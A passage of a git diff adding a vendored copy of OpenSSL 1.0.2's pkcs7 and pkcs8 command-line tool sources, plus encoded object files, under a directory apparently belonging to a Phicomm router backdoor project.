zkM+I{_|>5EchJFl_W>VuJ_A1X%i*&~l#1DpF5uhfy6&$N6wdvH_4)vR1o$gK2mJ{E
z{uSVNf)47h2R`aVfsgIF67csy|7nZPOThmC_<I2V2jCw8{vqI>n@uNFI6k;u90~Yc
zbWO*z%z~c___u)X(lHnAFMjFLqz*LRrOvk)IQ;}(l)DXF|Nn=-7`Xnw4aLe%>+Ap9
z&}rcM|0n##!1ezPC{a#p9sPd;q6V&ir|*=<Huc7X?ere+lkZ*ns4vtLEEhk#Di=R_
zDsPX)obtX1pD^81PCrcSi1hZ-|4Vnu>0jW7%IRONmWkiasq=N=M0vE2{^M?6d=r_n
zV5p0JCBi>P`M*+JQsGeSXQ<Vx^SJ6~eOZM~pE^99axT?o5P49vRKDL)A>U`v8{6i~
zQ}N6yA0AIH#&h`u$~{KC`jT1y$#j7=|4;2bWXqbB^unU+|JMG9N-iVXk6LxCn#q?$
zS$2|qS8oa(x6}5GbVVO$NOW+iX{aum+*O26qnAog#d4f2%HGW&@<7L5!@S4Fnx_5D
z%3lAU5zRO4d+0*8{=c6;JX3j3zKP!yeU6T`y}IqrS~r_)E0=~vhsk&DhOg4gv}aAT
i@7dyJAOCfnZYDr6<98rk%VvMa7HM=b*z%!i|Gxlcz>-V=

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkcs7.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkcs7.c
new file mode 100644
index 0000000..4d80f82
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkcs7.c
@@ -0,0 +1,308 @@
+/* apps/pkcs7.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <time.h>
+#include "apps.h"
+#include <openssl/err.h>
+#include <openssl/objects.h>
+#include <openssl/evp.h>
+#include <openssl/x509.h>
+#include <openssl/pkcs7.h>
+#include <openssl/pem.h>
+
+#undef PROG
+#define PROG    pkcs7_main
+
+/*-
+ * -inform arg  - input format - default PEM (DER or PEM)
+ * -outform arg - output format - default PEM
+ * -in arg      - input file - default stdin
+ * -out arg     - output file - default stdout
+ * -print_certs
+ */
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    PKCS7 *p7 = NULL;
+    int i, badops = 0;
+    BIO *in = NULL, *out = NULL;
+    int informat, outformat;
+    char *infile, *outfile, *prog;
+    int print_certs = 0, text = 0, noout = 0, p7_print = 0;
+    int ret = 1;
+#ifndef OPENSSL_NO_ENGINE
+    char *engine = NULL;
+#endif
+
+    apps_startup();
+
+    if (bio_err == NULL)
+        if ((bio_err = BIO_new(BIO_s_file())) != NULL)
+            BIO_set_fp(bio_err, stderr, BIO_NOCLOSE | BIO_FP_TEXT);
+
+    if (!load_config(bio_err, NULL))
+        goto end;
+
+    infile = NULL;
+    outfile = NULL;
+    informat = FORMAT_PEM;
+    outformat = FORMAT_PEM;
+
+    prog = argv[0];
+    argc--;
+    argv++;
+    while (argc >= 1) {
+        if (strcmp(*argv, "-inform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            informat = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-outform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outformat = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-in") == 0) {
+            if (--argc < 1)
+                goto bad;
+            infile = *(++argv);
+        } else if (strcmp(*argv, "-out") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outfile = *(++argv);
+        } else if (strcmp(*argv, "-noout") == 0)
+            noout = 1;
+        else if (strcmp(*argv, "-text") == 0)
+            text = 1;
+        else if (strcmp(*argv, "-print") == 0)
+            p7_print = 1;
+        else if (strcmp(*argv, "-print_certs") == 0)
+            print_certs = 1;
+#ifndef OPENSSL_NO_ENGINE
+        else if (strcmp(*argv, "-engine") == 0) {
+            if (--argc < 1)
+                goto bad;
+            engine = *(++argv);
+        }
+#endif
+        else {
+            BIO_printf(bio_err, "unknown option %s\n", *argv);
+            badops = 1;
+            break;
+        }
+        argc--;
+        argv++;
+    }
+
+    if (badops) {
+ bad:
+        BIO_printf(bio_err, "%s [options] <infile >outfile\n", prog);
+        BIO_printf(bio_err, "where options are\n");
+        BIO_printf(bio_err, " -inform arg   input format - DER or PEM\n");
+        BIO_printf(bio_err, " -outform arg  output format - DER or PEM\n");
+        BIO_printf(bio_err, " -in arg       input file\n");
+        BIO_printf(bio_err, " -out arg      output file\n");
+        BIO_printf(bio_err,
+                   " -print_certs  print any certs or crl in the input\n");
+        BIO_printf(bio_err,
+                   " -text         print full details of certificates\n");
+        BIO_printf(bio_err, " -noout        don't output encoded data\n");
+#ifndef OPENSSL_NO_ENGINE
+        BIO_printf(bio_err,
+                   " -engine e     use engine e, possibly a hardware device.\n");
+#endif
+        ret = 1;
+        goto end;
+    }
+
+    ERR_load_crypto_strings();
+
+#ifndef OPENSSL_NO_ENGINE
+    setup_engine(bio_err, engine, 0);
+#endif
+
+    in = BIO_new(BIO_s_file());
+    out = BIO_new(BIO_s_file());
+    if ((in == NULL) || (out == NULL)) {
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    if (infile == NULL)
+        BIO_set_fp(in, stdin, BIO_NOCLOSE);
+    else {
+        if (BIO_read_filename(in, infile) <= 0)
+            if (in == NULL) {
+                perror(infile);
+                goto end;
+            }
+    }
+
+    if (informat == FORMAT_ASN1)
+        p7 = d2i_PKCS7_bio(in, NULL);
+    else if (informat == FORMAT_PEM)
+        p7 = PEM_read_bio_PKCS7(in, NULL, NULL, NULL);
+    else {
+        BIO_printf(bio_err, "bad input format specified for pkcs7 object\n");
+        goto end;
+    }
+    if (p7 == NULL) {
+        BIO_printf(bio_err, "unable to load PKCS7 object\n");
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    if (outfile == NULL) {
+        BIO_set_fp(out, stdout, BIO_NOCLOSE);
+#ifdef OPENSSL_SYS_VMS
+        {
+            BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+            out = BIO_push(tmpbio, out);
+        }
+#endif
+    } else {
+        if (BIO_write_filename(out, outfile) <= 0) {
+            perror(outfile);
+            goto end;
+        }
+    }
+
+    if (p7_print)
+        PKCS7_print_ctx(out, p7, 0, NULL);
+
+    if (print_certs) {
+        STACK_OF(X509) *certs = NULL;
+        STACK_OF(X509_CRL) *crls = NULL;
+
+        i = OBJ_obj2nid(p7->type);
+        switch (i) {
+        case NID_pkcs7_signed:
+            certs = p7->d.sign->cert;
+            crls = p7->d.sign->crl;
+            break;
+        case NID_pkcs7_signedAndEnveloped:
+            certs = p7->d.signed_and_enveloped->cert;
+            crls = p7->d.signed_and_enveloped->crl;
+            break;
+        default:
+            break;
+        }
+
+        if (certs != NULL) {
+            X509 *x;
+
+            for (i = 0; i < sk_X509_num(certs); i++) {
+                x = sk_X509_value(certs, i);
+                if (text)
+                    X509_print(out, x);
+                else
+                    dump_cert_text(out, x);
+
+                if (!noout)
+                    PEM_write_bio_X509(out, x);
+                BIO_puts(out, "\n");
+            }
+        }
+        if (crls != NULL) {
+            X509_CRL *crl;
+
+            for (i = 0; i < sk_X509_CRL_num(crls); i++) {
+                crl = sk_X509_CRL_value(crls, i);
+
+                X509_CRL_print(out, crl);
+
+                if (!noout)
+                    PEM_write_bio_X509_CRL(out, crl);
+                BIO_puts(out, "\n");
+            }
+        }
+
+        ret = 0;
+        goto end;
+    }
+
+    if (!noout) {
+        if (outformat == FORMAT_ASN1)
+            i = i2d_PKCS7_bio(out, p7);
+        else if (outformat == FORMAT_PEM)
+            i = PEM_write_bio_PKCS7(out, p7);
+        else {
+            BIO_printf(bio_err, "bad output format specified for outfile\n");
+            goto end;
+        }
+
+        if (!i) {
+            BIO_printf(bio_err, "unable to write pkcs7 object\n");
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+    }
+    ret = 0;
+ end:
+    if (p7 != NULL)
+        PKCS7_free(p7);
+    if (in != NULL)
+        BIO_free(in);
+    if (out != NULL)
+        BIO_free_all(out);
+    apps_shutdown();
+    OPENSSL_EXIT(ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkcs7.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkcs7.o
new file mode 100644
index 0000000000000000000000000000000000000000..0a635db3a9b90ccd1be2d21d6db43286990e806b
GIT binary patch
literal 8088
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkcs8.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkcs8.c
new file mode 100644
index 0000000..5099e18
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkcs8.c
@@ -0,0 +1,402 @@
+/* pkcs8.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999-2004.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+#include <stdio.h>
+#include <string.h>
+#include "apps.h"
+#include <openssl/pem.h>
+#include <openssl/err.h>
+#include <openssl/evp.h>
+#include <openssl/pkcs12.h>
+
+#define PROG pkcs8_main
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    ENGINE *e = NULL;
+    char **args, *infile = NULL, *outfile = NULL;
+    char *passargin = NULL, *passargout = NULL;
+    BIO *in = NULL, *out = NULL;
+    int topk8 = 0;
+    int pbe_nid = -1;
+    const EVP_CIPHER *cipher = NULL;
+    int iter = PKCS12_DEFAULT_ITER;
+    int informat, outformat;
+    int p8_broken = PKCS8_OK;
+    int nocrypt = 0;
+    X509_SIG *p8 = NULL;
+    PKCS8_PRIV_KEY_INFO *p8inf = NULL;
+    EVP_PKEY *pkey = NULL;
+    char pass[50], *passin = NULL, *passout = NULL, *p8pass = NULL;
+    int badarg = 0;
+    int ret = 1;
+#ifndef OPENSSL_NO_ENGINE
+    char *engine = NULL;
+#endif
+
+    if (bio_err == NULL)
+        bio_err = BIO_new_fp(stderr, BIO_NOCLOSE);
+
+    if (!load_config(bio_err, NULL))
+        goto end;
+
+    informat = FORMAT_PEM;
+    outformat = FORMAT_PEM;
+
+    ERR_load_crypto_strings();
+    OpenSSL_add_all_algorithms();
+    args = argv + 1;
+    while (!badarg && *args && *args[0] == '-') {
+        if (!strcmp(*args, "-v2")) {
+            if (args[1]) {
+                args++;
+                cipher = EVP_get_cipherbyname(*args);
+                if (!cipher) {
+                    BIO_printf(bio_err, "Unknown cipher %s\n", *args);
+                    badarg = 1;
+                }
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-v1")) {
+            if (args[1]) {
+                args++;
+                pbe_nid = OBJ_txt2nid(*args);
+                if (pbe_nid == NID_undef) {
+                    BIO_printf(bio_err, "Unknown PBE algorithm %s\n", *args);
+                    badarg = 1;
+                }
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-v2prf")) {
+            if (args[1]) {
+                args++;
+                pbe_nid = OBJ_txt2nid(*args);
+                if (!EVP_PBE_find(EVP_PBE_TYPE_PRF, pbe_nid, NULL, NULL, 0)) {
+                    BIO_printf(bio_err, "Unknown PRF algorithm %s\n", *args);
+                    badarg = 1;
+                }
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-inform")) {
+            if (args[1]) {
+                args++;
+                informat = str2fmt(*args);
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-outform")) {
+            if (args[1]) {
+                args++;
+                outformat = str2fmt(*args);
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-topk8"))
+            topk8 = 1;
+        else if (!strcmp(*args, "-noiter"))
+            iter = 1;
+        else if (!strcmp(*args, "-nocrypt"))
+            nocrypt = 1;
+        else if (!strcmp(*args, "-nooct"))
+            p8_broken = PKCS8_NO_OCTET;
+        else if (!strcmp(*args, "-nsdb"))
+            p8_broken = PKCS8_NS_DB;
+        else if (!strcmp(*args, "-embed"))
+            p8_broken = PKCS8_EMBEDDED_PARAM;
+        else if (!strcmp(*args, "-passin")) {
+            if (!args[1])
+                goto bad;
+            passargin = *(++args);
+        } else if (!strcmp(*args, "-passout")) {
+            if (!args[1])
+                goto bad;
+            passargout = *(++args);
+        }
+#ifndef OPENSSL_NO_ENGINE
+        else if (strcmp(*args, "-engine") == 0) {
+            if (!args[1])
+                goto bad;
+            engine = *(++args);
+        }
+#endif
+        else if (!strcmp(*args, "-in")) {
+            if (args[1]) {
+                args++;
+                infile = *args;
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-out")) {
+            if (args[1]) {
+                args++;
+                outfile = *args;
+            } else
+                badarg = 1;
+        } else
+            badarg = 1;
+        args++;
+    }
+
+    if (badarg) {
+ bad:
+        BIO_printf(bio_err, "Usage pkcs8 [options]\n");
+        BIO_printf(bio_err, "where options are\n");
+        BIO_printf(bio_err, "-in file        input file\n");
+        BIO_printf(bio_err, "-inform X       input format (DER or PEM)\n");
+        BIO_printf(bio_err,
+                   "-passin arg     input file pass phrase source\n");
+        BIO_printf(bio_err, "-outform X      output format (DER or PEM)\n");
+        BIO_printf(bio_err, "-out file       output file\n");
+        BIO_printf(bio_err,
+                   "-passout arg    output file pass phrase source\n");
+        BIO_printf(bio_err, "-topk8          output PKCS8 file\n");
+        BIO_printf(bio_err,
+                   "-nooct          use (nonstandard) no octet format\n");
+        BIO_printf(bio_err,
+                   "-embed          use (nonstandard) embedded DSA parameters format\n");
+        BIO_printf(bio_err,
+                   "-nsdb           use (nonstandard) DSA Netscape DB format\n");
+        BIO_printf(bio_err, "-noiter         use 1 as iteration count\n");
+        BIO_printf(bio_err,
+                   "-nocrypt        use or expect unencrypted private key\n");
+        BIO_printf(bio_err,
+                   "-v2 alg         use PKCS#5 v2.0 and cipher \"alg\"\n");
+        BIO_printf(bio_err,
+                   "-v1 obj         use PKCS#5 v1.5 and cipher \"alg\"\n");
+#ifndef OPENSSL_NO_ENGINE
+        BIO_printf(bio_err,
+                   " -engine e       use engine e, possibly a hardware device.\n");
+#endif
+        goto end;
+    }
+#ifndef OPENSSL_NO_ENGINE
+    e = setup_engine(bio_err, engine, 0);
+#endif
+
+    if (!app_passwd(bio_err, passargin, passargout, &passin, &passout)) {
+        BIO_printf(bio_err, "Error getting passwords\n");
+        goto end;
+    }
+
+    if ((pbe_nid == -1) && !cipher)
+        pbe_nid = NID_pbeWithMD5AndDES_CBC;
+
+    if (infile) {
+        if (!(in = BIO_new_file(infile, "rb"))) {
+            BIO_printf(bio_err, "Can't open input file %s\n", infile);
+            goto end;
+        }
+    } else
+        in = BIO_new_fp(stdin, BIO_NOCLOSE);
+
+    if (outfile) {
+        if (!(out = BIO_new_file(outfile, "wb"))) {
+            BIO_printf(bio_err, "Can't open output file %s\n", outfile);
+            goto end;
+        }
+    } else {
+        out = BIO_new_fp(stdout, BIO_NOCLOSE);
+#ifdef OPENSSL_SYS_VMS
+        {
+            BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+            out = BIO_push(tmpbio, out);
+        }
+#endif
+    }
+    if (topk8) {
+        pkey = load_key(bio_err, infile, informat, 1, passin, e, "key");
+        if (!pkey)
+            goto end;
+        if (!(p8inf = EVP_PKEY2PKCS8_broken(pkey, p8_broken))) {
+            BIO_printf(bio_err, "Error converting key\n");
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+        if (nocrypt) {
+            if (outformat == FORMAT_PEM)
+                PEM_write_bio_PKCS8_PRIV_KEY_INFO(out, p8inf);
+            else if (outformat == FORMAT_ASN1)
+                i2d_PKCS8_PRIV_KEY_INFO_bio(out, p8inf);
+            else {
+                BIO_printf(bio_err, "Bad format specified for key\n");
+                goto end;
+            }
+        } else {
+            if (passout)
+                p8pass = passout;
+            else {
+                p8pass = pass;
+                if (EVP_read_pw_string
+                    (pass, sizeof pass, "Enter Encryption Password:", 1))
+                    goto end;
+            }
+            app_RAND_load_file(NULL, bio_err, 0);
+            if (!(p8 = PKCS8_encrypt(pbe_nid, cipher,
+                                     p8pass, strlen(p8pass),
+                                     NULL, 0, iter, p8inf))) {
+                BIO_printf(bio_err, "Error encrypting key\n");
+                ERR_print_errors(bio_err);
+                goto end;
+            }
+            app_RAND_write_file(NULL, bio_err);
+            if (outformat == FORMAT_PEM)
+                PEM_write_bio_PKCS8(out, p8);
+            else if (outformat == FORMAT_ASN1)
+                i2d_PKCS8_bio(out, p8);
+            else {
+                BIO_printf(bio_err, "Bad format specified for key\n");
+                goto end;
+            }
+        }
+
+        ret = 0;
+        goto end;
+    }
+
+    if (nocrypt) {
+        if (informat == FORMAT_PEM)
+            p8inf = PEM_read_bio_PKCS8_PRIV_KEY_INFO(in, NULL, NULL, NULL);
+        else if (informat == FORMAT_ASN1)
+            p8inf = d2i_PKCS8_PRIV_KEY_INFO_bio(in, NULL);
+        else {
+            BIO_printf(bio_err, "Bad format specified for key\n");
+            goto end;
+        }
+    } else {
+        if (informat == FORMAT_PEM)
+            p8 = PEM_read_bio_PKCS8(in, NULL, NULL, NULL);
+        else if (informat == FORMAT_ASN1)
+            p8 = d2i_PKCS8_bio(in, NULL);
+        else {
+            BIO_printf(bio_err, "Bad format specified for key\n");
+            goto end;
+        }
+
+        if (!p8) {
+            BIO_printf(bio_err, "Error reading key\n");
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+        if (passin)
+            p8pass = passin;
+        else {
+            p8pass = pass;
+            EVP_read_pw_string(pass, sizeof pass, "Enter Password:", 0);
+        }
+        p8inf = PKCS8_decrypt(p8, p8pass, strlen(p8pass));
+    }
+
